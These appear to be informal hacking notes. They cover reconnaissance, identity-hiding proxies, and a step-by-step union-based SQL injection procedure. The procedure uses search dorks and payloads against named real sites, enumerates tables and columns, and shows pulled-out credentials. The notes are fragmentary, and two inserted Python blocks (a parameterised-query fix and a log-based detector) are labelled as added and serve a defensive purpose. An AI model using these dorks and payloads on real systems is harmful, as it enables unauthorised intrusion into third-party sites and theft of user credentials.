
www.allwhois.com
2.Nslookup - IP from cmd
cmd>nslookup facebook.com

3.Reverse IP mapping - domains hosted on the same server


reverse Email lookup tool (you get signal)
search email

4.Info gathering of website using plugin


Wappalyzer
Apache/ Unix/ Nginx/ Litespeed - LINUX
Microsoft/ IIS/ Asp.net - WIN OS
glassfish - Java OS

5.Proxy Servers - Open Servers


www.kproxy.com
www.boomproxy.com
www.hidemy*.com - Maintain logs
VPN - Virtual Private Network
http://- 443 - No logs
http://vpngate.net/ - download vpn client
whatismyip.com

6.Info gathering using search engine


www.kartoo.com
www.maltego.org
www.shodan.io

PORTS - tunnels (65500+)


Physical -USB, Serial Port
Virtual - 1- 65535
https:// - 443
http:// - 80
ftp - 21
smtp - 25
POP - 110

to hack a website (sunny_3459@yahoo.in)

1.Basic SQL Injection / Authentication BYpass


SQL -
sunny sunny
select * from member where userid ='sunny' and password='sunny'
step 1: find out login page of website
site:iisc.ac.in
pk inurl:/login
pk inurl:/admin
pk inurl:/cpane
pk inurl:/cp

iisc.ac.in intext:username
intext

guessing user: select * from member where userid ='admin' and a
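The bypass above works because the user-supplied name is spliced straight into the query text, so a quote and a `--` comment (the two tokens the notes call out) can cut off the password check. The following added example is not part of the original notes; it builds a constructed in-memory `member` table with the page's `userid`/`password` columns, shows the concatenated query that is bypassed, and sits the parameterised version beside it. Passwords are stored in plaintext only to mirror the page's query; a real system would store a hash.

```python
import sqlite3


def make_db():
    """Constructed sample data: a 'member' table shaped like the one in the notes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table member (userid text, password text)")
    conn.executemany(
        "insert into member values (?, ?)",
        [("sunny", "sunny"), ("admin", "s3cret-not-guessable")],
    )
    conn.commit()
    return conn


def vulnerable_login(conn, userid, password):
    """String concatenation: the attacker controls part of the SQL text.

    userid = "admin' --" turns the query into
        select * from member where userid ='admin' --' and password='...'
    and the password clause becomes a comment.
    """
    query = (
        "select * from member where userid ='" + userid
        + "' and password='" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def safe_login(conn, userid, password):
    """Parameterised query: the driver sends the values separately from the
    SQL text, so a quote or '--' inside userid is just data to compare."""
    query = "select * from member where userid = ? and password = ?"
    return conn.execute(query, (userid, password)).fetchone() is not None


def compare(userid, password):
    """Run the same credentials through both versions; returns (vulnerable, safe)."""
    conn = make_db()
    return vulnerable_login(conn, userid, password), safe_login(conn, userid, password)


if __name__ == "__main__":
    print("valid creds     :", compare("sunny", "sunny"))        # (True, True)
    print("quote+comment   :", compare("admin' --", "wrong"))    # (True, False)
    print("wrong password  :", compare("admin", "wrong"))        # (False, False)
```

The only defensive change is in `safe_login`: the SQL text is a constant and the two values travel as bind parameters, which is why the same `admin' --` input that logs in through `vulnerable_login` is simply a non-existent user there.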

2.Advanced SQL Injection


select - select info from database
insert - insert values into database
update - update values in database
delete - delete values
create - create table
drop - drop table
order by - sorting columns
schema - structure of data base
' - starting of SQL values/commands

http://site.com/news.php?id=1-
http://site.com/news/10
news title:
news content:
news author:
? - asking data from database

step 1: find out link which contains ?id=10


pk inurl:php?id=
pk inurl:asp?id=
pk inurl:a

com.pk
gov.pk

step 2: add ' after ?id=10


http://citicollege.edu.edu.pk/main.php?Id=1'
http://tncgroup.pk/content.php?Id=2'

blank page = error page = SQL Injection Vulnerable

step 3: find out number of vulnerable links:


http://citicollege.edu.pk/main.php?Id=1'
id=1 to id=1000 --
-- : end of query
number of vulnerable links are 8

step 4: find out link from which we can select data:


http://citicollege.edu.pk/main.php?
Id=-1 union all select 1,2,3,4,5,6,7,8 --
we can select data from 2 & 6

step 5: finding out database, tables & columns


Id=-1 union all select 1,database(),3,4,5,6,7,8 --
DB: citioffi_college
schema - structure of tables & columns
information_schema - stores info
table_name
information_schema.tables - table structure
column_name
information_schema.columns - column structure
Id=-1 union all select
1, table_name ,3,4,5,6,7,8 from
information_schema.tables --

for complicated websites


Id=-1 union all select
1, group_concat(table_name) ,3,4,5,6,7,8 from
information_schema.tables --

table_schema=database() --
lito_user

for complicated websites


Id=-1 union all select
1, group_concat(column_name) ,3,4,5,6,7,8 from
information_schema.columns
where table_schema='lito_user' --

table: lito_user
columns: Id,Username,Password,FullName,Email

step 6: find out row values


Id=-1 union all select 1,UserName

Id=-1 union all select 1,Password,3,4,5,6,7,8 from lito_user --


admin:admin
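Every step of the procedure above leaves a recognisable trace in the web server's access log: a quote appended to a numeric `id` parameter, then `union all select`, then `information_schema` and `group_concat`. This added example (not from the original notes) is the detection side of those steps: it parses constructed Apache-style log lines, URL-decodes each request, and reports which of those patterns each request matches. The host names, IPs and paths are constructed; the regexes are assumptions about what these requests look like after decoding.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Constructed sample log lines mirroring the request shapes in the notes.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?id=10 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /main.php?Id=1' HTTP/1.1" 500 0
203.0.113.9 - - [10/Oct/2023:13:55:52 +0000] "GET /main.php?Id=-1+union+all+select+1,2,3,4,5,6,7,8+-- HTTP/1.1" 200 812
203.0.113.9 - - [10/Oct/2023:13:56:10 +0000] "GET /main.php?Id=-1%20union%20all%20select%201,group_concat(table_name),3,4,5,6,7,8%20from%20information_schema.tables%20-- HTTP/1.1" 200 2048
198.51.100.2 - - [10/Oct/2023:13:57:01 +0000] "GET /login.php HTTP/1.1" 200 1400
"""

# Apache combined-format prefix: client IP, timestamp, method and path.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP')

# Each rule is applied to the URL-decoded query string of one request.
RULES = {
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "group-concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "trailing-comment": re.compile(r"--\s*$"),
}
# Step 2 of the notes: a quote tacked onto a value that is otherwise a number.
NUMERIC_QUOTE_RE = re.compile(r"^-?\d+'$")


def classify_request(path):
    """Return the sorted list of rule names the decoded query string matches."""
    query = unquote_plus(urlsplit(path).query)
    hits = {name for name, rx in RULES.items() if rx.search(query)}
    # keep_blank_values so a bare "id=" is still examined
    for _, value in parse_qsl(query, keep_blank_values=True):
        if NUMERIC_QUOTE_RE.match(value):
            hits.add("quote-probe")
    return sorted(hits)


def scan_log(text):
    """Yield (ip, timestamp, path, hits) for every request that matched a rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        ip, ts, path = m.groups()
        hits = classify_request(path)
        if hits:
            findings.append((ip, ts, path, hits))
    return findings


if __name__ == "__main__":
    for ip, ts, path, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {ts} {hits}\n    {path}")
```

Decoding first matters: the third sample line arrives with `+` for spaces and the fourth with `%20`, and neither would match `union\s+all` on the raw line. Grouping findings by client IP, as the output above invites, turns the per-request rules into the sequence the notes describe (probe, then union, then schema enumeration) coming from one source.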

softwares:
Havij
SQL Injector
SQLMap